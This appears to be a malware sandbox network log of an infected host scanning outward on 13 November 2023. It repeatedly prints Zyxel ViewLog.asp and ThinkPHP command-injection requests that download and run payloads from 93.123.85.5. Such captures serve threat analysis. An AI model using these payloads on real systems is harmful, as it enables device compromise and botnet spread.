                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              170192.168.2.234728494.122.19.128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.487840891 CET4212OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              171192.168.2.234426862.29.32.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.491476059 CET4212OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              172192.168.2.233862088.80.187.21780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:34.220189095 CET4322OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:34.508980036 CET4326INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              173192.168.2.235183495.213.238.13080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:34.846019030 CET4384OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:35.178102970 CET4438INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:33 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              174192.168.2.235590095.82.48.15680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:34.846117973 CET4384OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:36.560725927 CET4560OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.576432943 CET4800OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:42.767920971 CET5334OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:50.958982944 CET6343OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.084817886 CET8308OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:40.616331100 CET12374OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              175192.168.2.235252695.47.56.6780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:35.495975971 CET4441OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              176192.168.2.234930095.209.142.17180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:35.846333027 CET4453OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              177192.168.2.234408495.100.210.23780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:35.933203936 CET4546OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:36.370414972 CET4556INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:36 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:36 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 30 63 39 31 30 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 31 36 26 23 34 36 3b 61 64 35 62 35 38 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;50c91002&#46;1699910316&#46;ad5b58a0</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              178192.168.2.233376031.136.252.1838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.189589024 CET4550OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.440404892 CET4921OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.583558083 CET5637OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:57.614008904 CET7094OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.186765909 CET10165OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.332308054 CET16297OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              179192.168.2.233690831.136.247.1988080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.190794945 CET4551OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.440380096 CET4921OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.583575010 CET5638OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:57.614023924 CET7095OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.186788082 CET10166OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.332313061 CET16297OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              18192.168.2.234351431.44.129.1168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:03.114782095 CET654OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              180192.168.2.233391231.136.236.968080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.190947056 CET4552OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.440365076 CET4921OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.583570004 CET5637OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:57.614018917 CET7095OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.186815977 CET10166OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.332325935 CET16298OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
